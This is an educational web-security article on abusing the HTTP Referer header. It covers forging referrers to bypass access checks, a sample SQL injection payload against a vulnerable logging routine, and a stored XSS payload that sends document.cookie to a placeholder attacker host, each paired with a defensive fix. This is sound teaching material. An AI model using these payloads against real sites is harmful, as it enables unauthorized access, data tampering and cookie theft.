HTTP Header Manipulation Series

Author: David Zimmer
Site:   http://sandsprite.com/Sleuth
-----------------------------------------------------------------------------------

As the third article in the HTTP header manipulation series, this document introduces the
HTTP referrer data field. It assumes that you have read the previous articles, as no real
discussion of the logistics of HTTP transfers will be given here.

The HTTP referrer data field is set by the browser to indicate which web page immediately
preceded, and led the viewer to, the current request. If the viewer simply entered the URL
by hand, no referrer is sent. It should also be noted that some anonymous proxies remove
this data field as a privacy feature. As a result, not all web authors will log it, and its
existence cannot be relied on in their scripts.
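As a minimal sketch of treating the field as optional, the hypothetical WSGI handler below
reads the referrer defensively. Two details are worth knowing: the HTTP specification spells
the header "Referer" (a long-standing misspelling), and WSGI, following the CGI convention,
exposes it as environ["HTTP_REFERER"]. The names get_referrer and app are illustrative
assumptions, not part of any existing site.

```python
def get_referrer(environ):
    """Return the Referer header from a WSGI environ, or None if it was not sent.

    WSGI (like CGI) exposes request headers as HTTP_* keys, so the
    'Referer' header arrives as environ['HTTP_REFERER'].
    """
    value = environ.get("HTTP_REFERER", "").strip()
    return value or None


def app(environ, start_response):
    """Hypothetical WSGI app that copes with a missing referrer."""
    referrer = get_referrer(environ)
    if referrer is None:
        # Typed URL, bookmark, or a proxy that strips the header.
        body = b"No referrer was sent.\n"
    else:
        body = ("You arrived from: " + referrer + "\n").encode("utf-8")
    start_response("200 OK", [("Content-Type", "text/plain; charset=utf-8")])
    return [body]
```

Passing an empty environ, as a hand-typed URL or a stripping proxy would produce, yields None
rather than an exception.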

With that said, it is common for web authors to use this field for a variety of purposes,
ranging from simple access control to complex statistical data gathering routines.

As an access control mechanism, web developers rely on the logic that if they do not give
you a link to a web page, then you should not be able to access it. This is fine for simple
things, such as preferring that people enter your site through the main page rather than
arriving at individual pages from bookmarks, but as a method of page security it is easily
foiled. The Achilles heel of this mechanism is that it relies solely on user-supplied data,
so it can be trivially bypassed by the user supplying bogus data.
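To illustrate how little it takes to defeat such a check, the sketch below pairs a
hypothetical server-side test (naive_referrer_check, assuming a site at
http://www.example.com) with a client request built using Python's standard urllib.request.
The request is only constructed, not sent; passing it to urllib.request.urlopen() would
transmit the forged header.

```python
import urllib.request

SITE = "http://www.example.com"  # hypothetical site used for illustration


def naive_referrer_check(headers):
    """Hypothetical 'access control': allow the request only if the Referer
    claims to come from our own site. It trusts client-supplied data."""
    referrer = headers.get("Referer", "")
    return referrer.startswith(SITE + "/")


def build_forged_request(target, fake_referrer):
    """Build (but do not send) a request carrying an arbitrary Referer."""
    return urllib.request.Request(target, headers={"Referer": fake_referrer})


req = build_forged_request(SITE + "/members/secret.html", SITE + "/index.html")

# The server only ever sees what the client chose to send:
forged_headers = {"Referer": req.get_header("Referer")}
print(naive_referrer_check(forged_headers))  # True: the check is bypassed
```

Command-line tools offer the same freedom; curl, for example, sets the header with its
-e/--referer option.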

Beyond this, there is another area where the referrer field appears in a more interesting
light: when a web developer uses it in his own surfer tracking and statistical routines.
Knowing where your surfers come from and who links to your site is an attractive data
source, but it also comes with a few hidden dangers. Again, the true danger here is the
developer assuming that this is a standard browser-generated field rather than treating it
as typical user-supplied data.

To collect statistical data, the information must first be saved in some manner, generally
with the end goal of generating reports for viewing later on.

The first attack targets the data storage routines. If the data is saved in a database, the
saving procedures could be subject to SQL injection attacks if the developer did not think
of filtering database-unfriendly characters (characters that would never occur in a
standard browser-supplied referrer string). The result of such an attack could easily be
data loss or tampering, and could range all the way up to arbitrary command execution on the
server. Refer to the SQL Injection documentation for further details on its capabilities.
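The sketch below uses Python's built-in sqlite3 module and a hypothetical hits table to
contrast a logging routine that pastes the referrer into the SQL text with one that uses a
parameterized query. The payload is an illustrative assumption; this demo only tampers with
the stored row, and what else an attacker can reach depends on the database and driver in use.

```python
import sqlite3


def make_db():
    """Create an in-memory database with a hypothetical hits table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE hits (referrer TEXT, ip TEXT)")
    return conn


def log_hit_unsafe(conn, referrer, ip):
    # VULNERABLE: the referrer is pasted directly into the SQL text.
    conn.execute("INSERT INTO hits (referrer, ip) VALUES ('%s', '%s')" % (referrer, ip))


def log_hit_safe(conn, referrer, ip):
    # Parameterized query: values are passed separately from the SQL,
    # so quotes in the referrer cannot change the statement's structure.
    conn.execute("INSERT INTO hits (referrer, ip) VALUES (?, ?)", (referrer, ip))


# A crafted referrer that closes the string literal, supplies its own "ip"
# value, and comments out the rest of the statement.
payload = "http://evil.example/', 'spoofed') --"

unsafe = make_db()
log_hit_unsafe(unsafe, payload, "10.0.0.1")
print(unsafe.execute("SELECT referrer, ip FROM hits").fetchall())
# [('http://evil.example/', 'spoofed')]   (the real client IP was discarded)

safe = make_db()
log_hit_safe(safe, payload, "10.0.0.1")
print(safe.execute("SELECT referrer, ip FROM hits").fetchall())
# [("http://evil.example/', 'spoofed') --", '10.0.0.1')]
```

Parameterized queries are generally preferable to filtering characters by hand, because the
driver never interprets the value as SQL at all.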

The second vector of attack is less direct but just as dangerous; it targets the report
generation phase of the statistical process. Web developers, being the crafty sort that
they are, will often use this same technology to generate site statistics HTML pages for
viewing through their web browsers somewhere in their administration web site. What better
language for reports and statistics than the rich context of the web environment?
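A naive version of such a report generator might look like the following sketch, which
assumes referrers arrive as a list of strings (None where no header was sent). The function
name and table layout are hypothetical; the point is that each referrer flows from the
request into the page without any transformation.

```python
from collections import Counter


def referrer_report_naive(referrers):
    """Hypothetical report builder: count referrers and emit an HTML table.

    WARNING: each referrer string is written into the page verbatim.
    """
    counts = Counter(r for r in referrers if r)  # skip missing referrers
    rows = "\n".join(
        f"<tr><td>{ref}</td><td>{n}</td></tr>" for ref, n in counts.most_common()
    )
    return f"<table>\n<tr><th>Referrer</th><th>Hits</th></tr>\n{rows}\n</table>"


log = ["http://a.example/", "http://b.example/", "http://a.example/", None]
print(referrer_report_naive(log))
```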

If an attacker were to embed malicious JavaScript in the referrer value, this content could
easily be output raw into the generated reports. Its actions could be as simple as relaying
administration site URLs to the attacker, or could extend to stealing cookie values or even
trying to exploit browser security holes that could lead to full access to the
administrator's machine!
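One common defense is to HTML-escape every logged value at the moment it is written into the
report. The sketch below, with a hypothetical function name and an illustrative attacker
payload (attacker.example is a placeholder), uses Python's standard html.escape so that a
script tag in the referrer is rendered as inert text instead of being executed.

```python
import html
from collections import Counter


def referrer_report_safe(referrers):
    """Hypothetical report builder that escapes each referrer before output."""
    counts = Counter(r for r in referrers if r)
    rows = "\n".join(
        # html.escape turns <, >, &, " and ' into entities.
        f"<tr><td>{html.escape(ref)}</td><td>{n}</td></tr>"
        for ref, n in counts.most_common()
    )
    return f"<table>\n<tr><th>Referrer</th><th>Hits</th></tr>\n{rows}\n</table>"


# Illustrative payload: a script that would send the admin's cookies elsewhere.
payload = ("http://x.example/<script>new Image().src="
           "'http://attacker.example/?c='+document.cookie</script>")
report = referrer_report_safe([payload])
print(report)  # the <script> tag appears as &lt;script&gt; text
```

Escaping covers element content and quoted attributes; if referrers are also turned into
clickable links, the URL scheme should be checked as well, since an escaped javascript: URL
placed in an href can still run when clicked.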

Clearly these attacks are preventable; the trick is in knowing what to look for and
understanding the implications of seemingly innocuous features that web developers often
take for granted. In article 4 of this series we will look at another commonly accessed
HTTP data field, the User-Agent string.